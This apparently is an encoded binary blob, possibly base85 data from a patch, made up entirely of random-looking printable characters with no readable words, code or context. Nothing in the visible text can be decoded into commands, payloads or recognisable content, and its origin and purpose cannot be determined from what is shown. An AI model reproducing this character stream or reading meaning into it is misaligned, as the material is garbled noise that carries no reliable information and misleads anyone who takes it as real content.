zMnK4|wN7IaTdEGwS8e&hNYD@koT*%>dBMG>hx!d;s`+Q3C2z1Fd&lU?D5SA!?$q!W zyKe-mvrF^ok5xukE_fXks?@w`(~LoeerGBgkTCnUX$4Ke%;S4|*V??EcYM?u58|Uf z`A-ES_XYMCYdh*dasH>Xgn3^gjb?9;RC}`j&Rj~t2x`Ws`t9r5obC(ZobGdp1OhDhAJyQU+Ybu!krmlHfijl1Pz@!rw&L6-uwLap zEwV1G7~2hYk^?G}`zVv_=Uu8W{{C*(8g=@G+lJeHAD`<#Z)j@z%*#=x#<>Gd^5LNh z;M!zYm|0<%rQdOxrm|1g-+o*|>Y$C4bBIvp?K*pM(CktD4Xm42(O!+x8dJl1y}*R=tnx|IQ zPDN_v7R1K}*A9PaEUMSLvP|!J10hP^+GY&hq4==3vRP8z@`y2oUsElIJ`2C(Hu3fQ zkm&1mr_QT~#x5AVA&FbzSJJB6f2>CEasRno+qorAdA(`b?`MlX?1dvboW%+$r}XE>xGMK_YZhH`ud{l6V_)W*W5g$x>YdeU~s;Q{_@{jI@z+{P4#$+WrKB6{yghF&ai>BE@xZmQ1S%GcdzF7HQ(h#U4eqBQEk)~~j# 
z2}^P{PBiId6rS!|bH(B+CAeV3UXS&6N?tRM?X3E4zVm|1rxE$Luf(Wbsm>oC@{PRs z*bU_Hw9j{}o(||6Pd7c0U41*qXi%Tg!{&#^*4|mzIt#2f~>bNVH z?-``Do|hQM+*|c}+0YRIm)?)^8E9n?;pXw`@rRd*pS-iK&wiSbw4tHAGRJffoMY-L zYhp@D1agk4EeNw}H?ePO3WAJ)E&A)keuk=+v_b0=lq-13@h}29DW0g{dy*QVlL>u? z29?R#4gn?hSG9*s8F}+~Rm0834;RcgO{pZ<4q7&C2+;ugzWJh2lGE(Vu9GbX_3U+e zznLBdrclUa3Q%;wo@PW>JIjVJVj`Dh`;XjNg3@rZUW*gvcqn70!-O=#pba66j zAnbxm4T@|sDnghlLU$7np~)tt@Lg9V^fLhAVpehrEk5cam*&;kTo{^(2+f3qa)IPP`ulX$#ilh@t|zMAB_1d`th3}!<#XeFF}1tZ z#!D8FJ$pJQ*DQ$CW_?(uk?!7Yk-AeNclCGGT$B3w3z!yU;-XgJw#BZITc}N}nJ?B_ z-?hT$xC>gb#{E_ zhmP>r}N9FlgZEC9|=3wXfi2! z>YDzdJ9XpBdOL8QMtvOSG_TiyJy)uYpEBbLhpQ*HhI_kQ;(i-(vEhSeqj54f<3Q>6 z;-jM8@12e~lIpWJUVW=}?cu>&F@bz?vCXVT&(%nA-KeKe9c|{V-NWL3yG2Se8$NFT z+H5_I{^4(H2fnCQ(;cto!ZtsBBY&FFt)k3}?Bh)jC+#~IZ=|;5a7Ocq>8G~xDVZm= zqH>E)y#8oEdD5J-+!=4T9ozdXd~9swl_};nQA)wzVqW@+Eb^w-UwCxQHC;L#H4Dxm z6#ioBwl}y;FvA!1DcZj3FbTIV&0$m71Pl?@QtaD`hWmb#Tgk)nokTWiOPo??k0;Gt zeoCNVxU*;8zr<>rOEzv^taaYqw%GVVSUDVx8`t6Ra5$u5SVdrg|6iw!BwcX`P0|tZ zeyG?Dy*)A8ID4LgahshBXJ>WMyd9-r-UfALGOUXvi954wBRAM~fA9A`VO1ON}hI zmd?1F@$UTO{PW?Lo z<Mm`E(!SroQzB9m<# z?Gt_;124qTuSE^=UShWS=;^aZTbCNej^A~%;l0Yys0RbscK1C`hwuAI(~tjTMJb*1 zV~kgEc5%+KjheGg1a=F!S~|~n95t(<@BJ@It3UY;d3s^5lGl*up3W1}H+^6Ee6cv# z@pezk+0mzZF1dcBFz3%_fOarJh3e4!}I0WqDxP$s4Y5RHpctoCEMqZ*sn8`?;O0`I$Cpm%G8#{ zc^Qw@m12h2bJq7~E+$+V?0Wm@(@%{{?@qNp_tP|J7_{={4TA38S+5%#gpo7s2bi-y zr4wcY9kvSUZrGp|s1I$Kt^g{G40xjIsS5jF(W8IUZzl@qs{T6;y9@n? zN1p7jbnM-HM%Cisl{c>BUS1xwGPz>wx!kYOpA0H}x_QN}p8h`J+m!d^Gqk2H>$O~u z+AGvZ%SyB;`OC=l#3|pscjnzTcq`hrT{4RHKexOQ%ETDM56lv1l{ z72SuBydQgWvL>bS2lSs;>dG|O@#)j@#(|@ovhVjXzLjHpazSmy{l|k=ioQMT6`fT4 zF091BZj{)=x?1FY;Xy#9MIsp7yg##Hk;p4y#csbH%UoAoS8AwjS?PAh>#o_*X~wjR zSAweFEOq~(yO(SGE!Dc8XR}wWN_m`rSm=l0@16aJ%_3c~A4$)&TmRm7TutAiQJ?R! 
z?l1h|QulQ`ye6prMQOmOL06Tg|JX72>e#?E!{G~0&(O^NM$ zfcu!!u=e4gPe;Vt2lv!SYpRa%OMNtM)hG>uHKdyt@%qAxm{Vh6!-IaycU?`}cSSd` zO#2FT=lN~_WVxkN&7`Qhn(80tT$vEV4SL`hKls`H(#;lnU0QBYhtm~wOd`zdqK5HQ z&@l9Wpkc685*nsTym8Ix2BTv_=L%W@rK_4#h9s#A3ceGKH6?0J-NN01(kh=mgsE{i zZua(ixYf*2f0)rlIQ&AbS?kHrm`8y&ttm5gHrVjmc!w`qs=XLA?$k}Kr(;IfCl`Lp zBlV||IUTaY%Uwnqq<*DtHXQl+rIj=d|PH&_NoyD)tbJi9~>*Hcvjll zx^|gx%dwM(509U4>x5C3#=ijXUajK4iDY(%!v2F6}YucmA$rhU=5%o1W4pEU33ie8Ln} zuO);W96T^%Q_!Z?Vy8-s}6_()#Mjug~9>#y z+~az^TPb-bTSHItVD>GeAGND5zaM$4M)_OLeaZvn87Q3JxL>4-D*M7 zyw=(jY7DV!oYsAHzFu4DqEC?#cD=H`)xFcTdwQd_%E_l&z%wIV%R3Ba_e#4@%{L~u z!8s~LKx3s!G?wmCvpHWcIXruFC-jlJhgo#Ttyajt)mWX3hdf21R3T6!{ywwS;aOp{k5PApEgtlpma?u@~eC$TqF+`{z2dYxF_ZOzm}E2>7C zL`4d>BrHrhvVDJQ*?1A9__Dr_zT<Fi|04eJYu&^jC-AaYUuj7kt0_`jGCiuw72}mwIAbwy;?S0cm4-dymWa>X5A69&m$SL?+M5Ln zT$j7wg`W8KpRs$1kGb8{y5gNzSjn%bw~jvuREEw?u_!q@_jB*<+YR;{nD*}a>=b*? zaT~UA%zR3^r?IDg%G%ocoV%8Kd4}4@reYWzXYvb60Mgs%cgB@d?kV)Y9SOt*Y&oPkTspmMhR%&cANAk}IrE^^u~& z@_n^(%ZCMLbI1W#EK<*^@>fKq(cq-eV%4F=H!MiF>&3HmUzyJ5uf7l8u#x_D%U?tGXZP^QEvm zFQQNL>gnmp2fG`8FbbIHTuU)+C?X%Ro_p3$1%Aq^U&MpgCr>bO>KEUVNvuV$x*0&8(Px*nY4rF{->kNOyycyT~=QrZPUUxyDQQ*XN7YS~@5 z==X%{9kxQWhfuX*$-IiCK%Vx4zB*Vb;5{4(5Kagto8 z-8>;|A&*lb>!G4sVQLSyQ%FqICR@PWVbJQ8jo%mc8CF2eSwOEUt~oe&(Tg7zlSRKw zsq2K)<%VjneP?RAIw#_UN)1zghF3_d#^ra&$>}#%tvCuZ6tO#ztzjz|s2F9^$qx?? 
zQLJZ>svlXo9_oIqEu=BS!hw4!C@XbjMc-Y!zjZQ$F0e~8+INr>_Tx><=4B_8KfiTm z41Bjg_-tb0VUxmMo;{mwZ=Ev;$h|Up`5@BZwwn=6-A*Owm-OkbclGqjq}1k$w=q*$ zd%LX<&Y{oVYLfW=jnagL53~;2tS%}V*ZMlO*XH}jj?GnGd?YktQEQeUP5G$f+J|@E z&LWw8-Mn<7-A?ne?&ppDb3Wc_{a6`o-1q&vsX>Va+kW&9+$k8^{mI^e$G3lcl_A(^ zv_@rg*-7re*hS@{A?4@TkhSm3TU#ww4kcNcefz$(kJ_S>QPnGQ?E`l-Px}<^{CfPk zZGCcf%^2WqFq?h8&-Gl(SblH2QO33@vBTXiK;b*G2OsU8@;0ra7xT8hx|I>pwD!Q- z{;#L=j~%fy)_*qoXu}m-W#7DztNETUrnSyLf67i%mp){%L7yc;fo1Bnm)f_u8WqJW zU+=jw=U~jvY{H%At9Py}JA3_z%}Bz_p#f{uT1b>zcS+>MGY3o)?`{g+J6IE0<6`yZ zZCZcU$)1jHR{iX~hdJ_mA#_$rul4rBvg^F`=^#Zs2WO?#*T2>@8 z=GE>yx{z8hiI17+KhWqOE!1{h^J5U^vG>7tCTvLinmmZB*ygA>T) zyXdmNLXiDXku9b<#0)POGMV6g?eJ3p2|`2Dxc%ZW;-^6w3qwCsbQCIm~S2l+h(TFbq4f=9~iHp69fL)5TEN>3$XJyXsH-Xr73JAH`5gEwzEiy%&Qz}5zeX!!_gdBTTilii&4-< z2s>j&t(^(8)~-3L*3kl0iO3cVCd<*1CNupRSx?gJ=T+uEud?`gmF3T>3P>y7&+42> zE53SAeMtq>Oko)h&9%aaghf6oS~^;xYGhXounXYW2W{CL8L5T=Gvq>~baig^*+WH| zHt*?ZjgUDEWYc_w2NM(uNVyF%T+&pCA{I^I=8Hi62GCW9OO_%z9N~1ZwNah$t2%yD zT|XFtm|W7)9zs{0zLDaShZarX=zyvmS^;gQCl4a>BUPN4Om-0cZ8kQON7Acv&wlL1^|&cg8qg^>nBW0OdaY%Lm#g9nFA z#|@7&FitT+jyk51ZlsYjNn0gOJxod3u5pS+%6H|E*htm!i>9W77~O$7gy9zIsD>Lb zuoO6gIpbKt1RVel^9J9AB;@|uF1ie^9BPlx#qO@nb$dpV46@V!0!k0W3zcYCM^nQ* z#J|C}1Hx$?BmadG0}j@Y0ro&ccBwt~S_kZV4z%w*#Ids&;C1ag+328(<+! 
zw68|f6|UZDfn4l(xSrwBj7OJfatE5+g2w64ncFF2ZOsvIn_^RXZiD=6fYwnS_5oy6 z3^$G<9U6;1!H~n~!soj%*(P21#%y_WrNAk#q6f8ZdPXm{3-Rl{=HyP{lGfU{QH&2GamhyFnD@#jpx8V3~C08L+yT zs43aT25iciVZcUcHbNt6Ej9xY8n9_f%m7K@;!0QWzQr3cdG7kKKb~fHWGNbl*(i4$ z<`gnGBQVslOHrMj8{1wn8)KR)=HMJgeW$N$Ociw~cNC#j06Gtw%W}6@Pl%P9hZ)_0 zVlgDb)o}4NMUe+h9m~ChYsg_(wPu-gVR5_Q2{z;!8*nMM0VFWw7;sqb?P(6CCOzdi zj@hd@8n9rbfdmE|dN^1P9C_$|P#sxnf!xg%xf?2R4LBmmTA$(aJDf9T6iZz5ISRPv zD3rS+<~@$XC`~$2$eP43;m9ROCY}M$)q!omI}YvF4A;^^$e|FUpH=qPMtV|>hkbYvo;&unjm_D1&SgPQsxg64GaA?STF zY3oTcphgH}+h|{?jbj5Mauv|I+z&}=gd38jEl`aeog*yD(dNRYfs$Qn+pxJn@y!kf zSr{1&l&z3^GW<*+OqQa_YjqNBljNqX=wNW{&(on}e07!;||X;RCQI zxI`H+<$>7p4OsFv*su-Q$C2S-jf!*)*tnTI2+f2UBnpNFV|9*$1Q$=GHe?inTz%P9 zSajtW(BfYvIb}!|lI!S#Cfpp4+FU(qlpAtfOxOk-2C^5nJQTJu;FMb73ImSY9okx4 zC3J4cb+I+z(zJ#=0nafEiN%FhK)2-5Ex86meJ)CKeb7>GT?74hk<;I2Hsnh7uSVsZ^4|WH)%P5CtBS&ibTF zB*RLCJcvnq5R5`FL^4r`WN?vNA#xoOZbGe*GqggwvBtVVEZjIG5A)*a!wr~ZjWd?p z2jKIU0o?`)&v50j@r<+e33jPSz1Gky7;X$B7g!sP%rycn{jJpFV3f5*Aln(PD{b*+ zClbL)jn&BZNM;$bJ7+~B){e%a)s1A~H3#m~N--8~g4nLm>QJRT3UNbwhZ-oa0kTzJ zb+mRv+F_Kr;&Gy2=GvUj*`)|4M;l|uc4$WP$Wj#Au{&y1qU|=@2zG?xovRM{neBsI zvOSKxm<)QUA3{Z=VaMQL!NOZB%#W*Pi@Z!JK{`hzqzEUxooI(QhiLyIgR%>-u947m zf2JCM9^n{^;!zxumT*?rxX?B6>UEFJSCeU}>v1$`8V-jo@1UuAW*M48sB3o|RFDqQ zq0rpS)=N-Yv@oe;6SBkIy0jYy1Gu*)dil^E|u0_Xz=vS}y{Fhb*U zV=Ds@`nW+uY~|BDn~$=>%MK||fDl}FNE{bx<%y_6j){8nP1ZVgLU9)PmowkUc^2sy zh$Fll9ufJ+jT&OIJQ-0Tu&gs0Yj?5~<&1go#Ahb&0*fQz;%$a}H6)>32!T#Cble2J zJw=qrgYppj0lW*%gXu^Z{A~II@D}F2kjN%MrN}ABQX&cphQZfxwrx5k09zq_S7Fn( zQxrP#dqVg&bb6bRJb7Bf-V_cb*{YVugLv?s@Bqg6JO#XIy9Lld@Lf(Ey{80S=)E4^ z^BK`+FML&i?to0xFuH2cQRC<!pAS(d5OkWNg?8WI# zoc3d(RESeQoK|A|Y@8;tEMcmH%S4UyJ1POp0oIibFhbc{fJ%%U(L00f2grIVOpq4;{p=v&Y zY@nqeC>OW010H|@mmLCAIsz{YwZxDs@WqtTn5PJ|!mKt&BNtlHcCTanGGpTAmu<#E0|8_ z2g1~d&xC0mBLt?-{0Nu^;xr#Fk%%6ZJs3!a&AfK7yqTR%vOyK(fNBGwoWr;rrVViC z#$rh%5I>e%&tQW&ICaoUf*3yE1g6DMS~ge;a&TM3tqtbfBTL&${ zMh(Tmx)vZ%4Vl9_bI?T%`M^3Wpi)CDSl1GaRYS3Gw02-R4Pl+xgDn`^1CA5hnD$@> 
zzJMMF>KQeJ16X5=Za^!*Vd&FN;Dl|{h@8N6TUwt;XHKBG9o^23y$9CCH)@v+T)3C#0p`v$Pb8TSD0HSZKc5X)K46UtE$4NH9?KV8c4=s5%<=W6iz$fvGaj{spx1vLAsG;+fWKn11BH0~N#>Ee;We`IHb#*q%fQv6b&j3?mH409bZq zhrpD=X+FCi3L-k}DXT5^R-tTbS*yCW8Oo zBlAb{c^MF(MEA0hd<(Q7kIeV}^@dmfbxx;V@61W;G@q4@sW{#4^!WG?+_hE!4pSqjG!TH`vI-D0%0MBXk)iG zPw2hK5AxhW)*QQw9C3_a8R}=e>#uIS3Yf@a;G4csGY6?ll~ds7Q%J^<E`Zx%gsRx zJ6K4ieQzQNSNqB0I8{KSj4G?P{Szr&!WdB%9Gs!?}l5PR9EQLf$q@d`8w1lE~>Hs8`jRFb}M+-6GTsq?SH2JW@ zGA-n!BBfP1aE161R0^fWci-hbbhD6I)xsBs5skyYfxgib2lXBCtsPgi_8U6dKBU-A z7C~7fYIbN#?aH8n<^XvQUxO?e*pcU&DQ^vZTT9E=%5Qi*#kYQ5um~p0Bq3T{6u^dk zY;P(ToCONYE*n`?Qt9~Q5R2Z46%Hp)N4-@=p};Pnp2p#}V4;$6bd8oumZ$oh;x8YJ zJg%ecuSh}vCC5|7fP1R^Rf}R$Lgfq<<x=^9ELejD*L zA&Z{=i@matoku0|7?C0{1^0S1JGdJIOECMwB7SmM2B>l%@t4rzG~#sQhZ6kMCqWoV^;Ayfw1 z-s^2uDne5hnPke50Pe6P9PwT3pP0t-SFdGNySd?eqzdQ+=&N7|g4sk$$M7KNlwR5=R5#th_2p|IO(&R@eZ%|AQ0aLOv6DGa-d%KApr6mhbA z_vRk`ULd8SEEG~Mr@a#+422xEFCP+8+HY;{_~vySRS_eiLt?J@e|~!7f#Ur3y8(rHp_p>t>j}WX9Mk8P4{-wOBpI$;J{IvSxRY}YedON zfwy3G1>0lRo=fwiP+tgCdO$0X!XGS*y6;e06CsE=`Q@zI9>I=OKfDg#LkM-)ul|Tu zs1(y|m2h0Zk=4_4X1owap*l)9IhJ0nSU4j6mmVYj_YnCEKs+gdL8;V;`Y%Q^yMK=7 zvT~^!rn$H60 zv*u^$8JEyR+R2?if`^fmr@pg?;MRO3X~T`-wtm1-?X*i)w{oz4J6m+u-^|9Tm=OP!jCIV(nWwiwi9Fw zPsPRN#4+hGxOf*6N28q15Gcsz`98?=?ukEoO{&>i=yTFzKCTB0+xSYY`rjRj3+B`U z+#F@qSd64e_!E5tz2YxHp{B4~!6oY*;rZr&1h&jVKK&UG-Z*u7u>#i^0kvcZYvHfZE-L(5R06+st&o!phuq&?;S$?xKn;e770Mq5 zy^Jh8X7BM4?Y!wKc4|)5kHSjA6*yobLW{RWhdRuEOUgnwptJiNT-`O7%#k3&j*U7? 
z9r!K0+7jb4|0CrO=zHJS@phv-R-SR5@rX>~GpIu3=pmF!h>ODp0*LCAfmjcERvB9gIz2ER^R_=vQ#5Di|j2U!PXQp-W~D!1TSjun*N!PkutgqX z#MLQ0%0nC@6{dp`rC!q5?5&Oo_3K#8^Xp*pTtD&trPayTRfoY%=3CV!!Drg1U_&mn z1J$s7d9<|V8{{P~I|;QMk|d%+^AEAwtJfi+Ih{r><4A77(I2NWypl= z-v|p<>-Tg6{;gDG8p83vX16)9V6euJdnI+8IA{>-4d%Ww!N{PJF-^@;;wKBPV&?eC z@b_19BReVn`i3IWtDSB9Du5|;RFWZ-nkfKh!P_T5xoPd47@L(Us}PrN92{1=s_)%2;TWx?5lVF7-+HiIo_0yXj0)@*q_!N5bGzos8NOEUxoiL zuy2vj(k>>4!(%qA4n}6^C;ymB63Tcsvpq#B1~r}?%ZzLiMu^)T`@iVMbuk^I9`(-I)F@v&G&N0{5|_$Y_8r&w80qW5C9ie;WO6e zL9hP;J!zro2P&-j-jlbcL`Sxm_h<&z`uv|LU?aODfz`)1mOd{ic`K06g%lwW1q+kgzr9tv@)V6%~MHU9F&cRb1kv_DS8 zavRPQpATiUIN>?9{B+yyYe?mpGdzATe{?nwq`6F8S<}tLjU?^(xj#u6Xq1uCSULTq z-Q*%W(w>#)eLGo%ez0;{Fz`i6J4slucuLpOAABI!O5<KHn&jdP3w5#+ActjU7=(n zLxjz&kbb{DQoSTcy`hj(ybUU=&xihZ>cu~79pyO)<#0ab;bI5c#6n+E-MR#?vfMTV z>-j}5Sil^eA`_^3_1dAM((cHA{Fsg}%oAgI0Dtp+QGb*TmCs>1u�_D#`$x`Lz%N zo<1oqKD(#CAmQ&EY)^W$4$yo50P*i1CXyaZy`SVcdWh(X66WeD-0ub9MuRcnFy=3U zqS(U>?)0&fVH94e5mSB1Y4NPbM)M%Apkm|o7jSlUa@yJw`o*?i2zt!?RqC5)K|I+v zd?Lv|zhFvk8VA>->oBq}3BEU_-TEQ*YHHHyKmy3nYiWZmgfYiWNI;FTxsXXhCow_V zM)ZCM_XP(^hOo?)9xL3i4=XsTNEhHmSnIUPJqxW66(-~ThH%cFrdS-i4($b}&4%(i z=a~8eSCZFT3Z&=i$J z$o#}$-y)?>{J!|mQQoP}=9G7+%uoCs7P#DBr*W zZ<1W!frR-I@4boB)=zrGXF9-cJ$D{B3v+~KD8ipSng-;CqFE?&v z2rG2^ERzW^4+A#g8DclKt9D`CQ5hqeqY2z-@k9cfFOEO2k>Cg5gOus^vPJHF8}RkVBYld`baGQX80`m{6il-ycwoBuFOJChE=OJtIaHGv%$%KKn(;8OIbl63`&| z$)wDSU`YjM%vHCy<6Fo={ZuO)!C|@QetYj-1KnHo4Ab}G^K8Qpla;!&`cwk%i6{32 z#PIKN24otHc|_q=jynvbFN6~nBIX@f$GizPfs1+FDTu|9>o3@iANIN z;cYM{3Pw#f4ewn(5!cK6jA(}`jZNYjY7h?KhS-@*pQj>qO$`Z1U#kj==XJgJ7O$Au z8^m%v579%QyA!nW>|ufJZ>~h=>TOgw2<1lfCe18jzVM5VB#(t^`L3>vuw>vjc{_=J zK#jdxlcIlYygn!m&;_+Vx%fnUL0`Qme-=jJmqH#ob3%meq!*i@{8fZT;`A+@L!561 z?g{5{WFYIcj6v7AyYicAl4YeABSI~>!M6cy>(v!!@DtpC`m2YRMfghhLMtS(Q}BvX_Oys| z59`Ukx17bDz|#N?zCfPfN6`tsUr&!QTLo)sk(V#Q*(85Yu~lAZ;cxu1yYAPz97N;4 zlv=Z9j5(2Da_8%YuEowK*$fEJNW{PG*Tjw)bDT7ZEu<3^t-E8e4v*V)k|JnSI=5vSA)pTn+HZgeQ6g`znBF1Yvh 
zm;Uh7C-I}tcMAN5q>Oru6RU6c%Agc+%3dhq_vJNT6-!&11kNlD}TEfRfS_PAyon59H$cz6K2q$zl zBozQOn8llQF0zdtbzAPw*e1AUWnT}~Z!DRZ$d~;wOz?!a9c_3D-*x&J+?BV{w8V!~ zSD<#cpi*|7s=^Oz;uxE)ihSukhtE& z#I?9VQweQV^wHxF4o+apG5Hc^8cr;-727qvvwPEno7`9hhwoK|Kq?^2>2X&9dpLfF zNNZcwoVaQvU~*DxGxq%}*3&n;CKN10a0dQY_)M`lGq!Q*&5nBZD%=+ zFPHp_tKlUABRkHTS5!9u0)2X_lH^&An0g|ta!D}5bgG51M^8cjeiL_V=+13r)2h=U zd5Q-U+G1=lN*%X}wyp8z-L>#wnDBE#4qAsmxvNIaqE!P)QrPSARAyx_n$lJqm)qE1 z)=8z+No`)Okq{c#3ryKl4pr<}|o(KWf<)d3{PA^G?~XzxQvlSSipS36jRm z>gzA#_)&Fh?sZ!Gz&#t(5Xb1Y?8|XuzLGZGN`D-g!h}4IqHvE8m?cKAxMUDrl0Ij+ z7HM>!?S`y=Ss&r3CVmm}(tNUeH_)WMrW*NMf8;w#M(L?Hdgl#MdxgkGs3cODuEXzs z`p+Q++V!`rcXEp;7@nM+qqHrV%*>pUn3c_cbh6#D+&xQty+r*sjgs`zJ5FA^j`=Xl z1AX&Y_ygl?!OZ057rjNnlG$iZznH(izUPQcdXx?bMlt!!(@|pT6C#ruo1g-;Si-RA z)l>yx_U#3~N{dmKk(_y}!hH53{#Gf0)mQjA#eZM%0Rs)6Pw6JZWwY+lHhYrT&wC;Y z<7W4uTGM%D-EVw-5LZ zUzhAytzGcoCn^&9ZOrzFQ7+|mMF9)7({U}R-zIbnU+*k}ShAxk#9>XVMN@n`KL2OHZoci+*ue4~MlBaT4Fu}eKZ zJ`of@8rF=4EUS|lzuvhN6S58;tt^J)8_&K0-8xq}ZyoObGRIC!+Wm8Who5WQu8X)R zhrZK{v;57&e-8%QFajT}Pu`L(@^?OsThi8vOzQOfU5SB{W40WsVlGeNfcZc@Bhf_4 zO(XJ7bFA4(po_&LE#`PObQ$kNlGw`OuQ2s2h6*8*0af~9GUAJ?FE2I1D~%8a%&*yu z+w1ZBn}C<>C1)o;* z(dOAX9s0I9?Zk-j&5M_<9u{LVL_;&E_57FA+eE8w&Tz1J#u=g=(${|C5b8Cn=4iI> z`dZf|DQOtg6e=iGN=s$gk`i$i=N#AB?8-%l4Ntld+?uY;ahuLbTkXO|>HLW>V+)mMmIoJ*Rjzvcxb{D>NF_Kg*o9=<-W;76W z>8oGXQ~l;Bs=;m1uj1zTqBrz#f5SRjcJ+nJXG2#9_MQ0*d8)H7p8aDDg-Yk2yTkJk z`U<{YwTV#|cFwnre}DO26PQ|2m`Halq*B}1{e?3H)!n-!w1ax3@@rR=Qwf*%naAdF z=x6u+bfJ1CQ^6k*S~*d9aPhyn7!5gxgHe$iKl|tAX`|*rd%okrdO?-N*UleKrgc=N z;7V6WtO`{p$9V9N&}U017D9OSGA{U_MrNJ#U0Mo>#;EN_J&CZv&zThj4}Vj$?NGE1 z_tXcE@S5i&Jiqts>o-rCN`O>;b*3tfV-aT|pi z(iB*1gh=T#nCy4k52q~sYJjBV+yqVb>*rEuXH&_!CIP$@-_v}pg^05+Uee8L6JhBZ zl&#VAa?Pu53T-JEgWiumW);-3X=W@|Gh~6xlFvLTXNqr%2!z$$isM$P_^{s~BWxfg zh%)OJVs!fAOUl>R{xV|8g+)qg*aNnDq2l z=U??3@!%{KeHVu@G}E{h2qO)f=63dV8Bz|}33n@S4&3vbvtXLioW|+PA-t*6Jj~-k1Jy+SDTTX^)7Pl+a ziDlbVUEe{mT1hUCQk;S3M<%g93u%-b&-GvpvOR6sxOq?P&^CLrmE7xvS@#G1E(DKn#ng$ zlK{~f^ClZ)*D{ 
zhfJ`{2p84GFShUlZ*?2F_TH4u97;$f7rg783O+8O$b`!*$fExKxVA(TGb~tjkVI;&D zZRTXZvBiy{I<@_8fx~|G0JIG!D&L%wkXFq@{YVq&>Bi7c(+gQ#AOCiT?3}vbNtO@e_Y6^rn(S6tiYT8%FzK z#|+0u1@r8)`_vV_QfGCcs@sOmz0#srS^Oiag46CebD`&h@BSq1n32s@R#q_&Mu)N} z0t$)4_a86@}<~da|VP=>v%In7TtB5?Syvq`+#v?{+<7hkCC*a4A&>}r6K6~M) zL~X0wx(lPHzbgHc$;Vh-?MBC-y{Rn2Rw8o64xSbMKCesOmhDwkz3Cu>lgCkUKC8f& zR*AfKxUG=PrhQ7uFe~sKQrt{;oxKD-9f_xF2S42Sg<0VxW&A|`_q|fcsjLBLdk2qd zQ;YM0JPKmNuq1Mos>-{Ckcb#tTH-n(XH9t?76BU(77r>_b9{j-snwi}p^Ox_EK}dU z0Q_2Gr|gt>(E_%gc{^HckU{%uC~uAJB8*k`)06l;tQ2RN4ZE#mf_~M5KlNPyTb<2F zFPfik`?6W7L{XMgoxSwsd|IB>fEyU3HIld{39x$U=GEFK26TG24CB`@1h7-Nt!*J$Y7APyYI{yXFfX2}k&3oi|-=5FAu);mXan%$mIkBUc`SDVp z_HGUl9%pgQ!tU^Rn%3>(`%0}ptorJo?e^0H2>R|8@fv&>V*LmhhP1BkG((@>*`ONR zW?G!Ly$wXR*IF?d4OyIXo2%qX?JSfdKXk69@*V2OxxA;-)!}RT3HsT>DoTWAt2C}X zQfXUs{i5!Z^)I2rx){1mR2eS{j4h?G}&5Tj6- z2h{hsCYsu?))QKr|HSSqPHa6)uJfRwlCEBKVY-#efVrt1Vl4@OBCx6dfkRjl?lOxr zJwjXhEE%(==udg}s4vYE)Oxl-#2HV(Bd_z_T1isPXpucJ8y9gyd z219M@2D&Iq-%3UL)z;TD3L-Ql0o0n+;lH|n@5Bk)wb0_)Xk9ba`R5f~*XG#|=RJI? z?mM&${c7Y1a+TV88&a(L&3XXQ_HCc$kE0z99_yil10hZ)+MY|c>C5D#fu5OB*oU7r zE&rr44j|Eviq0-P8Oos|AL(a151h9K8YcHSCp6tx5H+Iicdsy+9db|X|B*wB&K5*= zjMK60<2KP6o%eKcRk2G+XJF0FruUojNjaHGa;P&Mb9ZOHfjX?#vhaY{IoWL?ytcaW zWi?VHoS35i{wV#uGIMd6)aU%l;nan9x%M4s*RIpKACC^~_R6zcNu1B_xlUb4Wn@>i z-$%+c0$CY#4r(g5hW_IIk*;k;nT>$5n3~_zT%SF)q&enPNXoZKAglh7WXu}I(%mR< zZ?|amc-s>ivh9|aZne;%I$cNb%5_D(5A!g$jjty4;yW)NABAq0kJ&ZeePO#(w3!5G z!`hiutvxxMvF4`h3>Bz9;p6r^(FCPSF6y9UW!j&bcdq`4 zJQ-#P>5bp+oiO4HK%;M;@wV*u)yg%aw}^KfOD~VK-q|)=;@|GKoC{U{;c z^-g?)=^))OydBc=v5Pc;hkUp*a=rP(liGRX}! 
z_LK>pkEQ(H_0EM+aofX zY3)4CiFt^K;qQuL97u*R0%tuM^I zf)<+p@0N<*xZ#P1gN?L;lfkb>{z|2UN?xCLt(f>1C!DmFZw%PHMYk7FXE`rTvJW#Z z#TD+DD-NzZFI>IS4>b8m%GqK%J&KsbW@AAh)=P;8eHXZHrZM8cOj=D~J!{)DJpNUmH zW&?|;KR>6Rb`J*+?b>Qqc{iUOKX88XJJxvmyp=1>J6MrD6C)AWjzT0ba z+T^q?^mU)s+zhRzsi^vn*Eh zmKQ$Z8ZUh{%PiG4-q@UWw0RB)6y3_t76^P;$JNp;?$-i+AZuVeUP9%N=efM9R@+3WVK>u9ZwcJH)JzUN7%4y0@7W(CV)Y|o&1bm*TW0O-0wA^VK?VbDZ zINgT6onx`FhWCcoK%11|Y1r)k*kZw|#@(OdhU*h0#u3ijMZUe71COGpl#Yd(B@!It z0=x5t#vj+q(X=<$yhinroQ4&Ayk28a;u{l{hmB5re22-6ws*Pn#vPYA*DV!TIF~2V zNWufrZ(2HxBknpx6UNLqFL58VTxA=!?prh zC^=2VTExx#!$x6^`(pbcqWSP@=c0yL$@pTh>iWaqgfZ$`l7x*$3*nz-Tft7qmP89~ z^VR(2lvkoARST>~rmK8IOD##ik;Jt*oXsadn-eYVVC5D|egA99NLI**=2q{5(WxQa zPvRpTpSrdu1ZrdrtjAJ^DOi zCxf7!WLMl;OgL?Wb(Kd4M2A}CUU-!q9!znZs>VO}q&yiFvL6mVsuOY_E=OGJ!jCI2 zjS~~+v&N#K{ylBtcT{-p5WqdYK^Q469Bov5OHuY=B^b1o(oKVG@3xfaV?JdH=^I?U z&$Q_1)Y~f1$ichc8Fq{%KQ6VdxOC?eXUk~g*_mgyinnIsY)KoFc9+P z7fZ?NmBuH{*_Y(;T))>v#9w8A#SwX-$W;|qaJF{2Ps($dE`1C7w{$bI``zSkffamg zrPq&(pv@L89=Xml2Vi#i*`aLb}09q=!w8k1S3Zt-)zA1*&{@Tw-G~#GccYi`0kL z{=_%spKXms+sok)0G$FR_yM$5cKH)CS*9Mi#bkyhlIjAr#;%VsGRm;2S{$MG6 ziDK~7Yj?U-vFD}ZFmb(b9aiF%eas@)$!0&ZnMze^d%kBC(>AXAd_EjLn!!_~oXF4p zkpI*{RrFD0@Xp0VW7{pX=t@#&n}1LHA~Ny#M|3n}*4C*j(dNewKPhc@qk0VbuFt;T zWM$zURHiHIoi)Z(*OeJGkt7tt4tOB9HX9ZX&1%$CQC7`kDrBm;T-^W3eMe~5lhu87 z)`P}Sn~vK}${_Z#cHXDPX}qdaWx?Qt*rb~8ZoMb=PW31%)Wt7MZXWqE-#0IXyBSl# 